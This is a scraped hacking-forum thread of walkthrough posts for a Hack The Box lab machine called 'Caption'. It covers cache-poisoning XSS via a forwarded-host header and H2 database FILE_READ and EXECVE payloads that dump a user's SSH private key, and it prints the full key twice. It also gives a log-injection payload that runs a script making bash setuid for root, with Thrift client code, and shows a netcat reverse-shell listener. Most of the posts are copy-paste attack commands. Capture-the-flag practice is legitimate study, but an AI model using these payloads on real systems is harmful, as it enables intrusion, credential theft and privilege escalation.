[actarus]

Guys, why can't I reach port 8080? The page won't load. Do I need to do port forwarding first?

---

Guys, why can't I reach port 8080? The page won't load. Do I need to do port forwarding first?

The same here !

[cutearmadillo]

Chasing after intended route.
From root user I know that `ruth` user is running `bot.py` which visits `/firewalls?ip={IP}` (IP has to be internal(?), starting with `10.10.*`). The IP comes from whoever makes request to cached varnish url, if you're root I would suggest watching process with:

rootbash-5.1# varnishncsa -c -F "%{%Y-%m-%d %H:%M:%S}t %h %m %U %H %s %b %{VCL_Log:client_ip}x %D"

The URLs that are visited are cached, so if you visit the second time you get the cached website from varnish. You can see cache "age" from headers.
`XCGFULLBAN` can be used to clear cache for quick testing, or wait 120sec

curl caption.htb -X XCGFULLBAN

`Margo` can read the source code of application and there you will find `/firewalls` endpoint:

@app.route('/firewalls')
@login_required
def firewall():
    try:    return render_template('firewall.html',host=request.headers['X-Forwarded-Host'])
    except: return render_template('firewall.html',host='internal-proxy.local')

Template file is using `safe` which means you can just inject HTML (no SSTI AFAIK)

./templates/firewall.html:12:<script src="http://caption.htb/static/js/lib.js?utm_source=http://{{host|safe}}"></script>

Meaning you can perform XSS on the bot user to get `admin` credentials. (But without knowing app source, because then you know both margo and admin creds...) `admin` on 80 somewhat grants you permission to access `/logs` and `/download`. I know the XSS is intended because after bot doesn't find certain substring in first request it proceeds to make second request (to cached page!) (Also says cache has been poisoned)

`download` endpoint only allows you to "download" files via `requests.get` which only supports HTTP(s).

Is this a rabbit hole, because `H2` RCE feels too easy for Hard box?

If it's intended

• How were you supposed to gather this information?
  
• What are you supposed to do now? (Considering you got to XSS with little to no information)
  

- You get the information regarding the bot as note on the Firewalls page (Admins are actively addressing ...)
- You know there's a cache in use due to the HTTP response headers
- You'll see requests to the javascript file with the `utm_source` parameter in the network traffic / HTML code
- The header to use is pretty common
--> you'll get the admin cookie

Then you just need to bypass the ACL and download the SSH key.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[Anonymous2224]

USER FLAG // https://breachforums.bf/User-user142// THANK YOU

your kali machine:

$ echo "10.10.11.33" caption.htb >> /etc/hosts
##############################################
//browser
http://caption.htb:8080/ root:root
##############################################
http://10.129.204.201:8080/admin/dbviewer
#################################################################
SELECT CAST(FILE_READ('/home/margo/.ssh/id_ecdsa') AS VARCHAR);
//you get loke this: 2d2d2d2d2d424547494e204f50454e5353482050524956415445204b45592d2d2d2d2d0a6233426c626e4e7a614331725a586b74646a45414141414142473576626d554141414145626d39755a5141414141414141414142414141416141414141424e6c5932527a5953317a614745790a4c573570633352774d6a55324141414143473570633352774d6a55324141414151515277734d386a4f2b574475443546643735347851492f766a304e514a6267545353385755354f4c546a460a31557474625263797575356b6562762b466c414f656f436958476f5871364745535a686e374d50693241706f414141416f476935534a6c6f7555695a414141414532566a5a484e684c584e6f0a59544974626d6c7a644841794e54594141414149626d6c7a644841794e54594141414242424843777a794d3735594f34506b5633766e6a46416a2b2b505131416c75424e4a4c785a546b34740a4f4d585653323174467a4b36376d5235752f345755413536674b4a63616865726f59524a6d476673772b4c59436d674141414167554133384e642b7656306347417843766f5652326761362f0a6834493153777a2b54697773536e7a35393363414141414141514944424155474277673d0a2d2d2d2d2d454e44204f50454e5353482050524956415445204b45592d2d2d2d2d0a
###################################################################
$ apt install xxd
######################
$ echo "2d2d2d2d2d424547494e204f50454e5353482050524956415445204b45592d2d2d2d2d0a6233426c626e4e7a614331725a586b74646a45414141414142473576626d554141414145626d39755a5141414141414141414142414141416141414141424e6c5932527a5953317a614745790a4c573570633352774d6a55324141414143473570633352774d6a55324141414151515277734d386a4f2b574475443546643735347851492f766a304e514a6267545353385755354f4c546a460a31557474625263797575356b6562762b466c414f656f436958476f5871364745535a686e374d50693241706f414141416f476935534a6c6f7555695a414141414532566a5a484e684c584e6f0a59544974626d6c7a644841794e54594141414149626d6c7a644841794e54594141414242424843777a794d3735594f34506b5633766e6a46416a2b2b505131416c75424e4a4c785a546b34740a4f4d585653323174467a4b36376d5235752f345755413536674b4a63616865726f59524a6d476673772b4c59436d674141414167554133384e642b7656306347417843766f5652326761362f0a6834493153777a2b54697773536e7a35393363414141414141514944424155474277673d0a2d2d2d2d2d454e44204f50454e5353482050524956415445204b45592d2d2d2d2d0a" | xxd -r -p
#####################################################################
$ sudo nano id_ecdsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQRwsM8jO+WDuD5Fd754xQI/vj0NQJbgTSS8WU5OLTjF
1UttbRcyuu5kebv+FlAOeoCiXGoXq6GESZhn7MPi2ApoAAAAoGi5SJlouUiZAAAAE2VjZHNhLXNo
YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHCwzyM75YO4PkV3vnjFAj++PQ1AluBNJLxZTk4t
OMXVS21tFzK67mR5u/4WUA56gKJcaheroYRJmGfsw+LYCmgAAAAgUA38Nd+vV0cGAxCvoVR2ga6/
h4I1Swz+TiwsSnz593cAAAAAAQIDBAUGBwg=
-----END OPENSSH PRIVATE KEY-----
$ chmod 600 id_ecdsa
#######################################################################
$ ssh -i id_ecdsa margo@caption.htb
#######################################################################
$ margo@caption:~$ cat user.txt
user flag

---

ROOT FLAG //https://breachforums.bf/User-psymonsezz//THANK YOU
########################################################
#####your Kali machine:

ssh -i id_ecdsa -L 9090:127.0.0.1:9090 margo@caption.htb

#####remote machine:

$ cd /tmp/
$ nano malicious.log

127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"

$ nano payload.sh

chmod +s /bin/bash

#####your Kali machine:
create new terminal window:
$ nano log_service.thrift

namespace go log_service

service LogService {
string ReadLogFile(1: string filePath)
}


Make sure thrift is installed or install:

$ wget http://www.apache.org/dyn/closer.cgi?pat...0.0.tar.gz
$ tar -xvf thrift-0.20.0.tar.gz
$ cd thrift-0.20.0
$ ./bootstrap.sh
$ ./configure
$ sudo make
$ sudo make install

Now run:
$ thrift -r --gen py log_service.thrift

$ cd gen-py
$ nano client.py

from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService # Import generated Thrift client code

def main():
# Set up a transport to the server
transport = TSocket.TSocket('localhost', 9090)

# Buffering for performance
transport = TTransport.TBufferedTransport(transport)

# Using a binary protocol
protocol = TBinaryProtocol.TBinaryProtocol(transport)

# Create a client to use the service
client = LogService.Client(protocol)

# Open the connection
transport.open()

try:
# Specify the log file path to process
log_file_path = "/tmp/malicious.log"

# Call the remote method ReadLogFile and get the result
response = client.ReadLogFile(log_file_path)
print("Server response:", response)

except Thrift.TException as tx:
print(f"Thrift exception: {tx}")

# Close the transport
transport.close()

if __name__ == '__main__':
main()

$ python3 client.py

#####remote machine:
margo@caption:/tmp$ /bin/bash -p
bash-5.1# id
uid=1000(margo) gid=1000(margo) euid=0(root) egid=0(root) groups=0(root),1000(margo)
bash-5.1# cat /root/root.txt
root flag

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Replying to someone else's scam report | Failure to follow the first fucking rule of the scam reports section

[vaaditya320]

└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.20.127] 51902
bash: cannot set terminal process group (1035): Inappropriate ioctl for device
bash: no job control in this shell
root@caption:~# ls 
ls
go
go.mod
go.sum
output.log
root.txt
server.go
root@caption:~# cat root.txt
cat root.txt

---

Why do you need a shell when you can just cat the ssh private key?

└─$ ssh -i id_rsa margo@10.129.20.140
Load key "id_rsa": error in libcrypto

Ensure that your id_rsa key is in the correct OpenSSH format. After got the id_rsa from (CALL EXECVE('cat /home/margo/.ssh/id_ecdsa'); ) put it in to ChatGPT and ask format the key properly. then change the permitions to 'chmod 600'

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQSQxiAAOBdjkpWEZCyNVU/9nVmyOryfxXgikgtDBGwX
d+PYkz97OlMJIADx0dds8gR7SjxV+B1VJtRQJm4/wuIeAAAAoD9jQjY/Y0I2AAAAE2VjZHNhLXNo
YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJDGIAA4F2OSlYRkLI1VT/2dWbI6vJ/FeCKSC0ME
bBd349iTP3s6UwkgAPHR12zyBHtKPFX4HVUm1FAmbj/C4h4AAAAhANMx8DVOUW4eIgnGT/me3cyq
yYE+X1jwTBAhFrydzDweAAAAAAECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----

SSH KEY ARE NOT THE SAME IF YOU'RE USING - RELEASE ARENA

i did that, but when i use the ssh command, it still asks me for my password

[Art10n]

I think in every restart the flags and the ssh key are recreated -

[hackemall]

1726496151[/url]']

1726390545[/url]']
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.20.127] 51902
bash: cannot set terminal process group (1035): Inappropriate ioctl for device
bash: no job control in this shell
root@caption:~# ls 
ls
go
go.mod
go.sum
output.log
root.txt
server.go
root@caption:~# cat root.txt
cat root.txt

---

1726389777[/url]']

1726378857[/url]']


Ensure that your id_rsa key is in the correct OpenSSH format. After got the id_rsa from (CALL EXECVE('cat /home/margo/.ssh/id_ecdsa'); ) put it in to ChatGPT and ask format the key properly. then change the permitions to 'chmod 600'

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQSQxiAAOBdjkpWEZCyNVU/9nVmyOryfxXgikgtDBGwX
d+PYkz97OlMJIADx0dds8gR7SjxV+B1VJtRQJm4/wuIeAAAAoD9jQjY/Y0I2AAAAE2VjZHNhLXNo
YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJDGIAA4F2OSlYRkLI1VT/2dWbI6vJ/FeCKSC0ME
bBd349iTP3s6UwkgAPHR12zyBHtKPFX4HVUm1FAmbj/C4h4AAAAhANMx8DVOUW4eIgnGT/me3cyq
yYE+X1jwTBAhFrydzDweAAAAAAECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----

SSH KEY ARE NOT THE SAME IF YOU'RE USING - RELEASE ARENA

i did that, but when i use the ssh command, it still asks me for my password

Same for me

use sudo when you run ssh

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[rami13h]

Can someone show me the intended way to user via XSS,,,,I was confused about it

[hhbhhb]

https://github.com/kacperszurek/exploits...ted-rce.md

Does that work? Its only unauthenticated if the server it's running on is a windows.

it's not work for me

[HooptieDooptie]

https://github.com/kacperszurek/exploits...ted-rce.md

Does that work? Its only unauthenticated if the server it's running on is a windows.

it's not work for me

Nope, the authenticated could maybe be used. Turns out that running a Burpsuite brute force on the login page was the way to go. Then you have creds, then you can try the aunthenticated one. However, there are easier ways to get in, which you can find in the thread.

[Holz]

This will help for user --> https://medium.com/r3d-buck3t/chaining-h...535a9621a2